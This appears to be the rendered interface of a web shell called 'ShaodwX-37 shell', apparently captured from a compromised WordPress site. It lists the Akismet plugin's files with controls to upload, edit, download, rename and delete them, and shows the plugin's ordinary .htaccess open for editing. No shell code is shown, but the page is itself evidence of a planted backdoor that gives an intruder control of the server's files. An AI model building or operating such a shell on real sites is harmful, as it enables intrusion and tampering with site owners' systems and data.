ShaodwX-37 shell
GO
Back
ROOT
/
Upload
Create
Find
Sort: Name
Sort: Size
Apply
Name
Type
Size
Perm
Actions
..
DIR
-
0755
Rename
|
Delete
_inc
DIR
-
0755
Rename
|
Delete
views
DIR
-
0755
Rename
|
Delete
.htaccess
HTACCESS
786 B
0644
Edit
|
Download
|
Rename
|
Delete
akismet.php
PHP
7,102 B
0644
Edit
|
Download
|
Rename
|
Delete
changelog.txt
TXT
23,379 B
0644
Edit
|
Download
|
Rename
|
Delete
class-akismet-compatible-plugins.php
PHP
8,022 B
0644
Edit
|
Download
|
Rename
|
Delete
class.akismet.php
PHP
84,419 B
0644
Edit
|
Download
|
Rename
|
Delete
index.php
PHP
6,333 B
0644
Edit
|
Download
|
Rename
|
Delete
LICENSE.txt
TXT
18,092 B
0644
Edit
|
Download
|
Rename
|
Delete
readme.txt
TXT
6,106 B
0644
Edit
|
Download
|
Rename
|
Delete
ZIP selected
# Only allow direct access to specific Web-available files. # Apache 2.2 <IfModule !mod_authz_core.c> Order Deny,Allow Deny from all </IfModule> # Apache 2.4 <IfModule mod_authz_core.c> Require all denied </IfModule> # Akismet CSS and JS <FilesMatch "^(form\.js|akismet(-frontend|-admin)?\.js|akismet(-admin)?(-rtl)?\.css|inter\.css)$"> <IfModule !mod_authz_core.c> Allow from all </IfModule> <IfModule mod_authz_core.c> Require all granted </IfModule> </FilesMatch> # Akismet images <FilesMatch "^(logo-a-2x\.png|akismet-refresh-logo\.svg|akismet-refresh-logo@2x\.png|arrow-left\.svg|akismet-activation-banner-elements\.png)$"> <IfModule !mod_authz_core.c> Allow from all </IfModule> <IfModule mod_authz_core.c> Require all granted </IfModule> </FilesMatch>
Save